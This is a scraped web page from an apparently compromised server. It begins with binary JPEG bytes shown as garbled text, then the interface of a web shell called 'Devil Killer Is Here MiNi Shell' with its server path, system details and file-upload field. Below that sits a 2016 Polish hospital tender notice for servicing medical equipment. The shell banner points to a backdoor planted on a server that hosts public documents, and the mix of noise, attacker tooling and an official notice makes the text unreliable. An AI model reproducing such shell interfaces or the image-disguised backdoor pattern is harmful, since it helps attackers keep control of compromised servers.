JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/101333-N-2016.html

<p class="kh_header"><b>Rzeszów: Usługi wykonywania obsługi serwisowej: przeglądów i napraw aparatury medycznej</b><br>
<b>Numer ogłoszenia: 101333 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kliniczny Szpital Wojewódzki Nr 1 im. Fryderyka Chopina w Rzeszowie , ul. Szopena 2, 35-055 Rzeszów, woj. podkarpackie, tel. +48 17 8666 096, faks +48 17 8666 097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.szpital.rzeszow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi wykonywania obsługi serwisowej: przeglądów i napraw aparatury medycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej: przeglądów i napraw aparatury medycznej, wyszczególnionej w Częściach dla Klinicznego Szpitala Wojewódzkiego Nr 1 im. Fryderyka Chopina w Rzeszowie, a w tym:
a)	Część nr 1 - Obsługa serwisowa pomp infuzyjnych wolumetrycznych - 19 sztuk,
b)	Część nr 2 - Obsługa serwisowa defibrylatorów - 9 sztuk,
c)	Część nr 3 - Obsługa serwisowa defibrylatorów - 6 sztuk,
d)	Część nr 4 - Obsługa serwisowa defibrylatorów - 2 sztuki,
e)	Część nr 5 - Obsługa serwisowa defibrylatora - 1 sztuka
f)	Część nr 6 - Obsługa serwisowa aparatów do znieczuleń z monitorami anestetycznymi - 12 sztuk,
g)	Część nr 7 - Obsługa serwisowa respiratorów - 7 sztuk,
h)	Część nr 8 - Obsługa serwisowa respiratorów - 9 sztuk,
i)	Część nr 9 - Obsługa serwisowa respiratorów - 3 sztuki,
j)	Część nr 10 - Obsługa serwisowa zestawów do wspomagania oddechu - 8 sztuk,
k)	Część nr 11 - Obsługa serwisowa diatermii chirurgicznych - 13 sztuk,
l)	Część nr 12 - Obsługa serwisowa diatermii chirurgicznych - 3 sztuki,
m)	Część nr 13 - Obsługa serwisowa sterylizatorów - 2 sztuki,
n)	Część nr 14 - Obsługa serwisowa sterylizatorów - 10 sztuk,
o)	Część nr 15 - Obsługa serwisowa ultrasonografów - 5 sztuk,
p)	Część nr 16 - Obsługa serwisowa ultrasonografów - 2 sztuki,
q)	Część nr 17 - Obsługa serwisowa ultrasonografu - 1 sztuka,
r)	Część nr 18 - Obsługa serwisowa ultrasonografu - 1 sztuka,
s)	Część nr 19 - Obsługa serwisowa lamp operacyjnych - 8 sztuk,
t)	Część nr 20 - Obsługa serwisowa systemu do fototerapii - 1 sztuka,
u)	Część nr 21 - Obsługa serwisowa automatycznych wstrzykiwaczy kontrastu - 2 sztuki,
v)	Część nr 22 - Obsługa serwisowa automatycznego wstrzykiwacza kontrastu - 1 sztuka,
w)	Część nr 23 - Obsługa serwisowa inkubatorów noworodkowych - 12 sztuk,
x)	Część nr 24 - Obsługa serwisowa inkubatorów noworodkowych - 3 sztuki,
y)	Część nr 25 - Obsługa serwisowa aparatury i sprzętu medycznego różnych typów i producentów.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla poszczególnych Części zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.
4. Zamawiający nie dopuszcza składania ofert równoważnych w Części nr 25, a dopuszcza składania ofert równoważnych w Części nr 1-24. 
5. Kat. CPC: 1.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W tym postępowaniu Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu usług serwisowych z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami. 
Osoby te muszą spełniać niżej opisane wymagania:

A.	Część od  nr 1 do nr 24:
a) posiadać minimum 5-letnie doświadczenie w serwisowaniu aparatury medycznej objętej  przedmiotem zamówienia,
b)  posiadać wykształcenie techniczne;

B.	Część nr 25: 
Zamawiający wymaga przedstawienia minimum 3 osób do wykonania przedmiotu zamówienia w tej Części, a w tym: 
a) posiadać minimum 5-letnie doświadczenie w serwisowaniu aparatury medycznej objętej  przedmiotem zamówienia,
b)  posiadać wykształcenie techniczne;

Ocena spełniania tego warunku nastąpi na podstawie załączonego Wykazu osób wg wzoru na załączniku nr 4 do SIWZ (oryginał). Nie spełnienie przez Wykonawcę tego warunku spowoduje wykluczenie z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający dokona oceny na podstawie złożonego oświadczenia wykonawcy w trybie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Zamawiający wymaga, by: 
Część od nr 1 do 25:
a)	oferowane usługi serwisowe w danej Części były zgodne z Opisem Przedmiotu Zamówienia stanowiącym Załącznik nr 1 do SIWZ,
b)	Wykonawca dysponował zapleczem technicznym, materiałami potrzebnymi do wykonania przeglądów serwisowych i napraw (części zamienne, części zużywalne i części eksploatacyjne),
c)	Wykonawca posiadał/dysponował określonymi przez producenta aparatury/sprzętu instrukcjami serwisowymi/ instrukcjami wykonywania czynności serwisowych,
d)	Wykonawca zobowiązuje się do każdorazowego poświadczania w protokole czynności, że wykonane usługi będące przedmiotem zamówienia zostały zrealizowane zgodnie z wymogami producenta sprzętu/aparatury, co do zakresu wykonanych czynności i wymienionych części, podzespołów, itp.
 

2. W celu potwierdzenia wymagań opisanych powyżej Wykonawca winien załączyć do oferty:
a)	Oświadczenie według wzoru na Załączniku nr 6 do SIWZ (oryginał);

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszcza się składanie wspólnego oświadczenia o treści jak wyżej.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. POZOSTAŁE WYMAGANE DOKUMENTY:
1.	Wypełnione i podpisane przez osoby upoważnione do reprezentowania wykonawcy:
 a) Formularz oferty (Załącznik nr 7 do SIWZ- oryginał),
 b) Formularz cenowo - ofertowy dla danej oferowanej Części, sporządzony według wzoru załączonego do SIWZ (Załączniki nr 2 do SIWZ- oryginały), 
stanowiące integralne załączniki do SIWZ. 
2.	Jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej, wymagane jest przedstawienie pełnomocnictwa. Pełnomocnictwo to należy dołączyć do oferty. W swojej treści winno wskazywać uprawnienie do reprezentacji podmiotu/wykonawcy w postępowaniu o udzielenie zamówienia publicznego, a także musi być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem (kopia pełnomocnictwa powinna być poświadczona notarialnie).

II. Dobrze byłoby, by Oferta zawierała wszystkie ewentualne zmiany wprowadzone w czasie trwania postępowania. Jednakże ich brak nie spowoduje odrzucenia oferty w przypadku, gdy oferta będzie spełniać wymagania SIWZ.
III. UWAGA: Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. III.3) winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie. 
Konieczność ich spełniania odnosi się do konsorcjum jako całości, nie do jego poszczególnych członków. 
W punkcie III.3.1), III.3.2), III.3.3), III.3.5)  nie postawiono żadnych szczególnych warunków poza oświadczeniem z art. 22 ust. 1 Pzp.
Dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu z postępowania składa każdy z wykonawców oddzielnie.
Wszelka korespondencja dokonywana będzie wyłącznie z liderem (pełnomocnik, partner wiodący).
Rozliczenia dokonywane będą z liderem lub/i partnerem konsorcjum w zależności, który z członków konsorcjum realizować będzie zamówienie.
Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art.22 ust.1 Pzp może złożyć lider (pełnomocnik, partner wiodący) w imieniu konsorcjum.
W przypadku wymagań merytorycznych, przedmiotowych dopuszcza się możliwość składania oświadczeń i dokumentów przez lidera konsorcjum.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte zamówienia określoną w art. 366 Kodeksu cywilnego i zgodnie z art. 23 ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Z treści pełnomocnictwa winno wynikać jakiego postępowania dotyczy pełnomocnictwo, jakich Wykonawców dotyczy, wskazywać ustanowionego Wykonawcę - pełnomocnika oraz czy ustanowiony pełnomocnik jest uprawniony do reprezentowania w postępowaniu czy do reprezentowania wykonawców i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa powinien być podpisany przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z reprezentacją.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności w dniach - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmiany umowy w przypadku wystąpienia sytuacji trudnej do  przewidzenia w chwili zawarcia umowy tj.:
a)	dopuszcza zmianę osób odpowiedzialnych za nadzór nad realizacją zamówienia, o których mowa w § 10 umowy, w przypadku rozwiązania stosunku pracy lub innych zmian organizacyjnych w strukturze kadrowej Zamawiającego lub Wykonawcy;
b)	jeżeli w czasie realizacji umowy zmianie ulegnie nazwa, forma prawna, adres siedziby Zamawiającego lub Wykonawcy, strony zobowiązane są do powiadomienia siebie na wzajem o takiej zmianie i przedstawienia aneksu do Umowy;
c)	strony umowy dopuszczają zmianę stosunków umowy w przypadku, gdy zmiana ma charakter nadzwyczajny, jest niebywały i niezwykły (np.: różnego rodzaju klęski żywiołowe, epidemie, operacje wojenne, strajk generalny). Zaistniała sytuacja będzie miała charakter obiektywny, niezależny od stron umowy;
d)	dopuszcza się zmianę osób, które będą uczestniczyć w wykonywaniu usług serwisowych, w przypadkach zaistnienia sytuacji losowych, trudnych do przewidzenia tj. w przypadku zdarzeń losowych (śmierci, długotrwałej choroby), dyscyplinarnego zwolnienia, po przedstawieniu przez wykonawcę pisemnego oświadczenia oraz dowodów o zaistnieniu wymienionej sytuacji oraz pod warunkiem spełniania przez nowe osoby wymagań SIWZ na dzień składania ofert.
e)	na podstawie art. 144 ust.1 Pzp w przypadku zmian nieistotnych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.rzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kliniczny Szpital Wojewódzki Nr 1 im. Fryderyka Chopina w Rzeszowie, ul. Szopena 2, 35-055 Rzeszów, Dział Zamówień Publicznych, pokój nr 9, bud. J.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 09:00, miejsce: siedziba Zamawiającego przy ul. Szopena 2, w Kancelarii Ogólnej pok. nr 3, bud. C. w godz. od 07:30 do 15:05, od poniedziałku do piątku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.W Sekcji IV.2.1) Kryteria oceny ofert oraz w ZAŁĄCZNIKU I INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH pkt 4 dla Części nr od 1 do 25 podano: Cena oraz inne kryteria związane z przedmiotem zamówienia: 1. Cena - 95. 2. Termin płatności w dniach - 5. Przy wyborze najkorzystniejszej oferty w poszczególnych Częściach Zamawiający będzie się kierował następującymi kryteriami:
a) cena brutto oferty zł: 95%,  
b) termin płatności w dniach: 5%.
Uwaga: termin płatności w dniach winien wynosić min. 30 dni, max. 60 dni, licząc od dnia otrzymania faktury.
Za najkorzystniejszą zostanie uznana oferta niepodlegająca odrzuceniu, przedstawiająca najkorzystniejszy bilans ceny, terminu płatności w dniach (suma punktów otrzymanych w dwóch kryteriach).
2. Planowany termin otwarcia ofert: 01.07.2016r., o godzinie 10:00. Miejsce otwarcia ofert: w pokoju nr 9, bud. J Szpitala, w siedzibie Zamawiającego przy ulicy Szopena 2. 3.Sygnatura sprawy: KSW.XII.252/AM/49/16, Postępowanie nr 51.
4.W oparciu o art. 41 pkt 12 Pzp: nie zamierza się zawierać umowy ramowej. 
5. Zamawiający informuje, że przed wszczęciem postępowania o zamówienie publiczne nie zastosowano dialogu technicznego. 
6. Uwaga do Sekcji III.4.2): - punktor pierwszy: W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, Oświadczenie z art. 24 ust.1 ustawy Pzp składa każdy z wykonawców oddzielnie, wg wzoru na załączniku nr 5 do SIWZ (oryginał). 
- punktor trzeci: Spółki cywilne przedstawiają zaświadczenie urzędu skarbowego dla wszystkich wspólników oraz zaświadczenie na całą spółkę cywilną z jej nazwą. 
7. Zamawiający nie przewiduje aukcji elektronicznej w tym postępowaniu. 
